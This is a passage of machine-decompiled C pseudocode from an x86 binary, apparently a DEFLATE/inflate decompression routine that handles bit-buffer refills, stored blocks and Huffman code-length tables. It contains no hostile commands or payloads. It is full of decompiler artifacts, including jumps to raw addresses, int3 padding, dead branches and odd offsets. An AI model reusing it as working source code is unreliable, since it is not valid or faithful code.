    																	if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																		 *(_t2870 - 0xa4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																		 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																		goto L433;
    																	} else {
    																		L423:
    																		_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																		if(_t2465 == 0) {
    																			 *(_t2870 - 0xa4) = 0;
    																			L431:
    																			L433:
    																			if(0 != 0) {
    																				goto L422;
    																			} else {
    																				_t2566 =  *(_t2870 - 0xa4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																				 *(_t2870 - 0xc) = _t2566;
    																				 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																				_t2180 =  *(_t2870 - 8);
    																				if(_t2180 <  *(_t2870 - 0x24)) {
    																					goto L422;
    																				} else {
    																					goto L435;
    																				}
    																			}
    																		} else {
    																			L424:
    																			 *(_t2870 - 0x1c) = 1;
    																			_t1692 =  *(_t2870 + 8);
    																			 *_t1692 = 0x19;
    																		}
    																	}
    																}
    															}
    														} else {
    															L531:
    															_t1692 =  *( *(_t2870 + 8) + 0x14) & 0x00000001;
    															if(_t1692 == 0) {
    																L48:
    																if( *(_t2870 - 8) >= 3) {
    																	L62:
    																	 *( *(_t2870 + 8) + 0x14) =  *(_t2870 - 0xc) & 0x00000007;
    																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 3;
    																	 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
    																	if(0 != 0) {
    																		goto L48;
    																	} else {
    																		 *( *(_t2870 + 8) + 0x18) =  *( *(_t2870 + 8) + 0x14) >> 1;
    																		_t1692 =  *(_t2870 + 8);
    																		if( *((intOrPtr*)(_t1692 + 0x18)) != 0) {
    																			_t2086 =  *(_t2870 + 8);
    																			if( *((intOrPtr*)(_t2086 + 0x18)) != 3) {
    																				if( *( *(_t2870 + 8) + 0x18) != 1) {
    																					 *(_t2870 - 0x10) = 0;
    																					L189:
    																					if( *(_t2870 - 0x10) >= 3) {
    																						goto 0x230a5e;
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						_push( *(_t2870 + 8) + (_t1692 << 1) + 0x40);
    																						_t1743 =  *( *0x00DD9D9D)();
    																						_t2873 = _t2873 + 0xc;
    																						 *(_t2870 - 0x10) = 0;
    																						L210:
    																						_t2136 =  *(_t2870 + 8);
    																						if( *(_t2870 - 0x10) >=  *((intOrPtr*)(_t2136 + (_t1743 << 1) + 0x2c))) {
    																							 *((intOrPtr*)( *(_t2870 + 8) + (_t2136 << 1) + 0x2c)) = 0x13;
    																							goto L231;
    																						} else {
    																							L212:
    																							if( *(_t2870 - 8) >= 3) {
    																								L226:
    																								 *(_t2870 - 0x114) =  *(_t2870 - 0xc) & 0x00000007;
    																								_t1987 =  *(_t2870 - 0xc) >> 3;
    																								 *(_t2870 - 0xc) = _t1987;
    																								 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
    																								if(0 != 0) {
    																									goto L212;
    																								} else {
    																									_t1743 =  *(_t2870 - 0x114);
    																									 *( *(_t2870 + 8) + (_t1987 << 1) + 0x40 + ( *( *(_t2870 - 0x10) + 0x22ba14) & 0x000000ff)) = _t1743;
    																									 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
    																									goto L210;
    																								}
    																							} else {
    																								L213:
    																								_t1692 =  *(_t2870 - 4);
    																								if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																									 *(_t2870 - 0xc0) =  *( *(_t2870 - 4)) & 0x000000ff;
    																									 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																									goto L224;
    																								} else {
    																									L214:
    																									_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																									if(_t2086 == 0) {
    																										 *(_t2870 - 0xc0) = 0;
    																										L222:
    																										L224:
    																										if(0 != 0) {
    																											goto L213;
    																										} else {
    																											 *(_t2870 - 0xc) =  *(_t2870 - 0xc0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																											 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																											if( *(_t2870 - 8) < 3) {
    																												goto L213;
    																											} else {
    																												goto L226;
    																											}
    																										}
    																									} else {
    																										L215:
    																										 *(_t2870 - 0x1c) = 1;
    																										_t2465 =  *(_t2870 + 8);
    																										 *_t2465 = 0xe;
    																									}
    																								}
    																							}
    																						}
    																					} else {
    																						L190:
    																						_t428 =  *(_t2870 - 0x10) + 0x22b010; // 0x7030200
    																						if( *(_t2870 - 8) >=  *_t428) {
    																							L204:
    																							_t456 =  *(_t2870 - 0x10) + 0x22b010; // 0x7030200
    																							 *( *(_t2870 + 8) + 0x2c +  *(_t2870 - 0x10) * 4) = (0x00000001 <<  *_t456) - 0x00000001 &  *(_t2870 - 0xc);
    																							_t464 =  *(_t2870 - 0x10) + 0x22b010; // 0x7030200
    																							 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *_t464;
    																							_t468 =  *(_t2870 - 0x10) + 0x22b010; // 0x7030200
    																							_t2759 =  *_t468;
    																							_t2000 =  *(_t2870 - 8) - _t2759;
    																							 *(_t2870 - 8) = _t2000;
    																							if(0 != 0) {
    																								goto L190;
    																							} else {
    																								goto 0x230a4a;
    																								asm("int3");
    																								_t1692 =  *(_t2870 - 0x10);
    																								 *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1692 * 4)) =  *((intOrPtr*)(_t2000 + 0x2c + _t2759 * 4)) +  *((intOrPtr*)(0x22ba28 +  *(_t2870 - 0x10) * 4));
    																								 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
    																								goto L189;
    																							}
    																						} else {
    																							L191:
    																							_t2465 =  *(_t2870 - 4);
    																							if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																								 *(_t2870 - 0xe0) =  *( *(_t2870 - 4)) & 0x000000ff;
    																								 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																								goto L202;
    																							} else {
    																								L192:
    																								_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																								if(_t1692 == 0) {
    																									 *(_t2870 - 0xe0) = 0;
    																									L200:
    																									L202:
    																									if(0 != 0) {
    																										goto L191;
    																									} else {
    																										 *(_t2870 - 0xc) =  *(_t2870 - 0xe0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																										 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																										_t453 =  *(_t2870 - 0x10) + 0x22b010; // 0x7030200
    																										if( *(_t2870 - 8) <  *_t453) {
    																											goto L191;
    																										} else {
    																											goto L204;
    																										}
    																									}
    																								} else {
    																									L193:
    																									 *(_t2870 - 0x1c) = 1;
    																									_t2086 =  *(_t2870 + 8);
    																									 *_t2086 = 0xb;
    																								}
    																							}
    																						}
    																					}
    																				} else {
    																					 *(_t2870 - 0x60) =  *(_t2870 + 8) + 0x40 + _t1692 * 0;
    																					 *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) = 0x120;
    																					 *( *(_t2870 + 8) + 0xbadbd9) = 0x20;
    																					_push(0x20);
    																					_push(5);
    																					_push( *(_t2870 + 8) + 0xbadbed);
    																					_t2086 =  *0x00DD9D9D;
    																					 *_t2086();
    																					_t2873 = _t2873 + 0xc;
    																					 *(_t2870 - 0x5c) = 0;
    																					while( *(_t2870 - 0x5c) <= 0x8f) {
    																						 *( *(_t2870 - 0x60)) = 8;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					while( *(_t2870 - 0x5c) <= 0xff) {
    																						 *( *(_t2870 - 0x60)) = 9;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					while( *(_t2870 - 0x5c) <= 0x117) {
    																						 *( *(_t2870 - 0x60)) = 7;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					while( *(_t2870 - 0x5c) <= 0x11f) {
    																						 *( *(_t2870 - 0x60)) = 8;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					L231:
    																					L233:
    																					if( *( *(_t2870 + 8) + 0x18) < 0) {
    																						goto L350;
    																					} else {
    																						 *((intOrPtr*)(_t2870 - 0x68)) =  *(_t2870 + 8) + 0x40 +  *( *(_t2870 + 8) + 0x18) * 0xda0;
    																						_push(0x40);
    																						_push(0);
    																						_push(_t2870 - 0x1a8);
    																						 *( *0x00DD9D9D)();
    																						_push(0x800);
    																						_push(0);
    																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x120);
    																						 *( *0x00DD9D9D)();
    																						_push(0x480);
    																						_push(0);
    																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x920);
    																						 *( *0x00DD9D9D)();
    																						_t2873 = _t2873 + 0x24;
    																						 *(_t2870 - 0x64) = 0;
    																						while( *(_t2870 - 0x64) <  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
    																							 *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) =  *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) + 1;
    																							 *(_t2870 - 0x64) =  *(_t2870 - 0x64) + 1;
    																						}
    																						 *(_t2870 - 0xd8) = 0;
    																						 *(_t2870 - 0x9c) = 0;
    																						_t1692 = 4 << 0;
    																						 *(_t2870 + 0xfffffffffffffe9c) = 0;
    																						_t2465 = 0;
    																						 *(_t2870 + 0xfffffffffffffe98) = 0;
    																						 *(_t2870 - 0x64) = 1;
    																						while( *(_t2870 - 0x64) <= 0xf) {
    																							 *(_t2870 - 0xd8) =  *(_t2870 - 0xd8) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8));
    																							 *(_t2870 - 0x9c) =  *(_t2870 - 0x9c) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8)) << 1;
    																							_t2465 =  *(_t2870 - 0x64);
    																							 *(_t2870 + _t2465 * 4 - 0x164) =  *(_t2870 - 0x9c);
    																							_t1692 =  *(_t2870 - 0x64) + 1;
    																							 *(_t2870 - 0x64) = _t1692;
    																						}
    																						if( *(_t2870 - 0x9c) == 0x10000 ||  *(_t2870 - 0xd8) <= 1) {
    																							 *(_t2870 - 0x78) = 0xffffffff;
    																							 *(_t2870 - 0x80) = 0;
    																							while(1) {
    																								_t2666 =  *(_t2870 - 0x80);
    																								if(_t2666 >=  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
    																									break;
    																								}
    																								 *(_t2870 - 0x34) = 0;
    																								 *(_t2870 - 0x74) =  *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x80)) & 0x000000ff;
    																								if( *(_t2870 - 0x74) != 0) {
    																									 *(_t2870 - 0xe8) =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168);
    																									_t2719 =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) + 1;
    																									 *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) = _t2719;
    																									_t2331 =  *(_t2870 - 0x74);
    																									 *(_t2870 - 0xc8) = _t2331;
    																									while( *(_t2870 - 0xc8) > 0) {
    																										_t2331 =  *(_t2870 - 0x34) << 0x00000001 |  *(_t2870 - 0xe8) & 0x00000001;
    																										 *(_t2870 - 0x34) = _t2331;
    																										_t2719 =  *(_t2870 - 0xc8) - 1;
    																										 *(_t2870 - 0xc8) = _t2719;
    																										 *(_t2870 - 0xe8) =  *(_t2870 - 0xe8) >> 1;
    																									}
    																									if( *(_t2870 - 0x74) > 0xa) {
    																										 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2));
    																										if( *(_t2870 - 0x6c) == 0) {
    																											 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2)) =  *(_t2870 - 0x78);
    																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
    																											 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
    																										}
    																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 9;
    																										 *(_t2870 - 0xd0) =  *(_t2870 - 0x74);
    																										while( *(_t2870 - 0xd0) > 0xb) {
    																											 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
    																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
    																											if( *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) != 0) {
    																												 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2));
    																											} else {
    																												 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x78);
    																												 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
    																												 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
    																											}
    																											 *(_t2870 - 0xd0) =  *(_t2870 - 0xd0) - 1;
    																										}
    																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
    																										 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
    																										 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x80);
    																									} else {
    																										 *((short*)(_t2870 - 0xcc)) =  *(_t2870 - 0x74) << 0x00000009 |  *(_t2870 - 0x80);
    																										while( *(_t2870 - 0x34) < 0x400) {
    																											goto 0x230ab1;
    																											asm("int3");
    																											 *((short*)(_t2719 + 0x120 + _t2331 * 2)) =  *((intOrPtr*)(_t2870 - 0xcc));
    																											_t2331 =  *(_t2870 - 0x74);
    																											_t2719 = (1 << _t2331) +  *(_t2870 - 0x34);
    																											 *(_t2870 - 0x34) = 1;
    																										}
    																									}
    																									goto L248;
    																								} else {
    																									L248:
    																									 *(_t2870 - 0x80) =  *(_t2870 - 0x80) + 1;
    																									continue;
    																								}
    																								break;
    																							}
    																							if( *( *(_t2870 + 8) + 0x18) != 2) {
    																								L349:
    																								_t2086 =  *( *(_t2870 + 8) + 0x18) - 1;
    																								 *( *(_t2870 + 8) + 0x18) = _t2086;
    																								goto L233;
    																							} else {
    																								 *(_t2870 - 0x10) = 0;
    																								L274:
    																								_t2669 =  *(_t2870 + 8);
    																								_t1900 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2666 * 0)) +  *((intOrPtr*)(_t2669 + 0x30));
    																								if( *(_t2870 - 0x10) >= _t1900) {
    																									_t2086 = 4 << 0;
    																									_t2465 =  *(_t2870 + 8);
    																									_t1903 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2669 * 0)) +  *((intOrPtr*)(_t2465 + 0x30));
    																									if(_t1903 ==  *(_t2870 - 0x10)) {
    																										_push( *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1903 * 0)));
    																										_push( *(_t2870 + 8) + 0x2924);
    																										_push( *(_t2870 + 8) + 0x40);
    																										 *((intOrPtr*)( *0x0022C1F0))();
    																										_push( *( *(_t2870 + 8) + 0xbadbd9));
    																										_push( *(_t2870 + 8) +  *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) + 0x2924);
    																										_push( *(_t2870 + 8) + 0xbadbed);
    																										 *((intOrPtr*)( *((intOrPtr*)(0x22c1f0))))();
    																										_t2873 = _t2873 + 0x18;
    																										goto L349;
    																									} else {
    																										L344:
    																										 *(_t2870 - 0x1c) = 0xffffffff;
    																										_t1692 =  *(_t2870 + 8);
    																										 *_t1692 = 0x15;
    																									}
    																								} else {
    																									L276:
    																									if( *(_t2870 - 8) >= 0xf) {
    																										L307:
    																										_t2296 =  *((short*)( *(_t2870 + 8) + (_t1900 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																										 *(_t2870 - 0x40) = _t2296;
    																										if( *(_t2870 - 0x40) < 0) {
    																											 *(_t2870 - 0x48) = 0xa;
    																											do {
    																												 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2296 << 1) + 0x40 + 0x920 + ( !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001)) * 2));
    																												_t2296 =  *(_t2870 - 0x48) + 1;
    																												 *(_t2870 - 0x48) = _t2296;
    																											} while ( *(_t2870 - 0x40) < 0);
    																										} else {
    																											 *(_t2870 - 0x48) =  *(_t2870 - 0x40) >> 9;
    																											 *(_t2870 - 0x40) =  *(_t2870 - 0x40) & 0x000001ff;
    																										}
    																										 *(_t2870 - 0x28) =  *(_t2870 - 0x40);
    																										_t1900 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x48);
    																										 *(_t2870 - 0xc) = _t1900;
    																										_t2086 =  *(_t2870 - 8) -  *(_t2870 - 0x48);
    																										 *(_t2870 - 8) = _t2086;
    																										_t2465 = 0;
    																										if(0 != 0) {
    																											goto L276;
    																										} else {
    																											if( *(_t2870 - 0x28) >= 0x10) {
    																												if( *(_t2870 - 0x28) != 0x10 ||  *(_t2870 - 0x10) != 0) {
    																													_t1937 =  *(_t2870 - 0x28);
    																													_t841 = _t1937 + 0x22b004; // 0x70302
    																													_t2315 =  *_t841;
    																													 *(_t2870 - 0x24) = _t2315;
    																													L322:
    																													if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
    																														L336:
    																														goto 0x230b37;
    																														asm("int3");
    																														asm("int3");
    																														asm("int3");
    																														 *(_t2870 - 0x8c) = (_t1937 << _t2315) - 0x00000001 &  *(_t2870 - 0xc);
    																														 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
    																														_t1937 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
    																														 *(_t2870 - 8) = _t1937;
    																														_t2315 = 0;
    																														if(0 != 0) {
    																															goto L322;
    																														} else {
    																															 *(_t2870 - 0x8c) =  *((char*)( *(_t2870 - 0x28) + 0x22b008)) +  *(_t2870 - 0x8c);
    																															if( *(_t2870 - 0x28) != 0x10) {
    																																 *(_t2870 - 0x108) = 0;
    																															} else {
    																																 *(_t2870 - 0x108) =  *( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2923) & 0x000000ff;
    																															}
    																															_push( *(_t2870 - 0x8c));
    																															_push( *(_t2870 - 0x108));
    																															_push( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924);
    																															_t2666 = 4 << 0;
    																															 *((intOrPtr*)( *0x0022C1F4))();
    																															_t2873 = _t2873 + 0xc;
    																															 *(_t2870 - 0x10) =  *(_t2870 - 0x10) +  *(_t2870 - 0x8c);
    																															goto L274;
    																														}
    																													} else {
    																														L323:
    																														_t1692 =  *(_t2870 - 4);
    																														if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																															 *(_t2870 - 0xbc) =  *( *(_t2870 - 4)) & 0x000000ff;
    																															 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																															goto L334;
    																														} else {
    																															L324:
    																															_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																															if(_t2086 == 0) {
    																																 *(_t2870 - 0xbc) = 0;
    																																L332:
    																																L334:
    																																if(0 != 0) {
    																																	goto L323;
    																																} else {
    																																	_t1937 =  *(_t2870 - 0xbc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																																	 *(_t2870 - 0xc) = _t1937;
    																																	_t2315 =  *(_t2870 - 8) + 8;
    																																	 *(_t2870 - 8) = _t2315;
    																																	if( *(_t2870 - 8) <  *(_t2870 - 0x24)) {
    																																		goto L323;
    																																	} else {
    																																		goto L336;
    																																	}
    																																}
    																															} else {
    																																L325:
    																																 *(_t2870 - 0x1c) = 1;
    																																_t2465 =  *(_t2870 + 8);
    																																 *_t2465 = 0x12;
    																															}
    																														}
    																													}
    																												} else {
    																													L318:
    																													 *(_t2870 - 0x1c) = 0xffffffff;
    																													_t1692 =  *(_t2870 + 8);
    																													 *_t1692 = 0x11;
    																												}
    																											} else {
    																												 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924)) =  *(_t2870 - 0x28);
    																												_t2666 =  *(_t2870 - 0x10) + 1;
    																												 *(_t2870 - 0x10) = _t2666;
    																												goto L274;
    																											}
    																										}
    																									} else {
    																										if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
    																											_t1900 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
    																											 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
    																											 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    																											 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    																											goto L307;
    																										} else {
    																											L278:
    																											_t2694 =  *((short*)( *(_t2870 + 8) + (_t2086 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																											 *(_t2870 - 0x40) = _t2694;
    																											if( *(_t2870 - 0x40) < 0) {
    																												if( *(_t2870 - 8) <= 0xa) {
    																													goto L291;
    																												} else {
    																													 *(_t2870 - 0x48) = 0xa;
    																													do {
    																														_t1900 =  !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001);
    																														 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2694 << 1) + 0x40 + 0x920 + _t1900 * 2));
    																														_t2694 =  *(_t2870 - 0x48) + 1;
    																														 *(_t2870 - 0x48) = _t2694;
    																														if( *(_t2870 - 0x40) < 0) {
    																															goto L288;
    																														}
    																														break;
    																														L288:
    																														_t1900 =  *(_t2870 - 0x48) + 1;
    																													} while ( *(_t2870 - 8) >= _t1900);
    																													if( *(_t2870 - 0x40) < 0) {
    																														goto L291;
    																													} else {
    																														goto L304;
    																													}
    																												}
    																											} else {
    																												_t1900 =  *(_t2870 - 0x40) >> 9;
    																												 *(_t2870 - 0x48) = _t1900;
    																												if( *(_t2870 - 0x48) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x48)) {
    																													L291:
    																													_t2086 =  *(_t2870 - 4);
    																													if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																														 *(_t2870 - 0xb4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																														 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																														goto L302;
    																													} else {
    																														L292:
    																														_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																														if(_t2465 == 0) {
    																															 *(_t2870 - 0xb4) = 0;
    																															L300:
    																															L302:
    																															if(0 != 0) {
    																																goto L291;
    																															} else {
    																																_t2086 =  *(_t2870 - 8);
    																																 *(_t2870 - 0xc) =  *(_t2870 - 0xb4) << _t2086 |  *(_t2870 - 0xc);
    																																_t1900 =  *(_t2870 - 8) + 8;
    																																 *(_t2870 - 8) = _t1900;
    																																if( *(_t2870 - 8) < 0xf) {
    																																	goto L278;
    																																} else {
    																																	goto L304;
    																																}
    																															}
    																														} else {
    																															L293:
    																															 *(_t2870 - 0x1c) = 1;
    																															_t1692 =  *(_t2870 + 8);
    																															 *_t1692 = 0x10;
    																														}
    																													}
    																												} else {
    																													L304:
    																													goto L307;
    																												}
    																											}
    																										}
    																									}
    																								}
    																							}
    																						} else {
    																							L244:
    																							 *(_t2870 - 0x1c) = 0xffffffff;
    																							_t2086 =  *(_t2870 + 8);
    																							 *_t2086 = 0x23;
    																						}
    																					}
    																				}
    																			} else {
    																				L165:
    																				 *(_t2870 - 0x1c) = 0xffffffff;
    																				_t2465 =  *(_t2870 + 8);
    																				 *_t2465 = 0xa;
    																			}
    																		} else {
    																			L64:
    																			if( *(_t2870 - 8) >= ( *(_t2870 - 8) & 0x00000007)) {
    																				L78:
    																				 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> ( *(_t2870 - 8) & 0x00000007);
    																				_t2018 =  *(_t2870 - 8) & 0x00000007;
    																				 *(_t2870 - 8) =  *(_t2870 - 8) - _t2018;
    																				if(0 != 0) {
    																					goto L64;
    																				} else {
    																					 *(_t2870 - 0x10) = 0;
    																					L81:
    																					if( *(_t2870 - 0x10) >= 4) {
    																						 *(_t2870 - 0x10) =  *( *(_t2870 + 8) + 0x2920 + _t2018 * 0) & 0x000000ff | ( *( *(_t2870 + 8) + 0xbb04cd) & 0x000000ff) << 0x00000008;
    																						_t2465 =  *(_t2870 + 8);
    																						_t1692 = ( *(_t2465 + 0x2923) & 0x000000ff) << 8;
    																						if( *(_t2870 - 0x10) == (( *( *(_t2870 + 8) + 0xbb04cd) & 0x000000ff | _t1692) ^ 0x0000ffff)) {
    																							L117:
    																							if( *(_t2870 - 0x10) == 0 ||  *(_t2870 - 8) == 0) {
    																								L139:
    																								if( *(_t2870 - 0x10) == 0) {
    																									goto L531;
    																								} else {
    																									L140:
    																									_t1692 =  *(_t2870 - 0x14);
    																									if(_t1692 <  *((intOrPtr*)(_t2870 - 0x70))) {
    																										L144:
    																										_t1692 =  *(_t2870 - 4);
    																										if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																											if( *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14) >=  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4)) {
    																												 *((intOrPtr*)(_t2870 - 0x104)) =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
    																											} else {
    																												 *((intOrPtr*)(_t2870 - 0x104)) =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
    																											}
    																											if( *((intOrPtr*)(_t2870 - 0x104)) >=  *(_t2870 - 0x10)) {
    																												 *(_t2870 - 0x100) =  *(_t2870 - 0x10);
    																											} else {
    																												if( *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14) >=  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4)) {
    																													 *(_t2870 - 0xfc) =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
    																												} else {
    																													 *(_t2870 - 0xfc) =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
    																												}
    																												 *(_t2870 - 0x100) =  *(_t2870 - 0xfc);
    																											}
    																											 *(_t2870 - 0x94) =  *(_t2870 - 0x100);
    																											_push( *(_t2870 - 0x94));
    																											_push( *(_t2870 - 4));
    																											_push( *(_t2870 - 0x14));
    																											 *((intOrPtr*)( *((intOrPtr*)(0x22c1f0))))();
    																											_t2873 = _t2873 + 0xc;
    																											 *(_t2870 - 4) =  *(_t2870 - 4) +  *(_t2870 - 0x94);
    																											_t2465 =  *(_t2870 - 0x14) +  *(_t2870 - 0x94);
    																											 *(_t2870 - 0x14) = _t2465;
    																											 *(_t2870 - 0x10) =  *(_t2870 - 0x10) -  *(_t2870 - 0x94);
    																											goto L139;
    																										} else {
    																											_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																											if(_t2086 == 0) {
    																												L149:
    																												 *(_t2870 - 0x1c) = 0xffffffff;
    																												_t2086 =  *(_t2870 + 8);
    																												 *_t2086 = 0x28;
    																											} else {
    																												L146:
    																												 *(_t2870 - 0x1c) = 1;
    																												_t2465 =  *(_t2870 + 8);
    																												 *_t2465 = 0x26;
    																											}
    																										}
    																									} else {
    																										L141:
    																										 *(_t2870 - 0x1c) = 2;
    																										_t2086 =  *(_t2870 + 8);
    																										 *_t2086 = 9;
    																									}
    																								}
    																							} else {
    																								L119:
    																								if( *(_t2870 - 8) >= 8) {
    																									L133:
    																									 *(_t2870 - 0x28) =  *(_t2870 - 0xc) & 0x000000ff;
    																									 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 8;
    																									 *(_t2870 - 8) =  *(_t2870 - 8) - 8;
    																									_t2086 = 0;
    																									if(0 != 0) {
    																										goto L119;
    																									} else {
    																										L134:
    																										_t2465 =  *(_t2870 - 0x14);
    																										if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
    																											 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x28);
    																											 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
    																											_t2465 =  *(_t2870 - 0x10) - 1;
    																											 *(_t2870 - 0x10) = _t2465;
    																											goto L117;
    																										} else {
    																											L135:
    																											 *(_t2870 - 0x1c) = 2;
    																											_t1692 =  *(_t2870 + 8);
    																											 *_t1692 = 0x34;
    																										}
    																									}
    																								} else {
    																									L120:
    																									_t2086 =  *(_t2870 - 4);
    																									if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
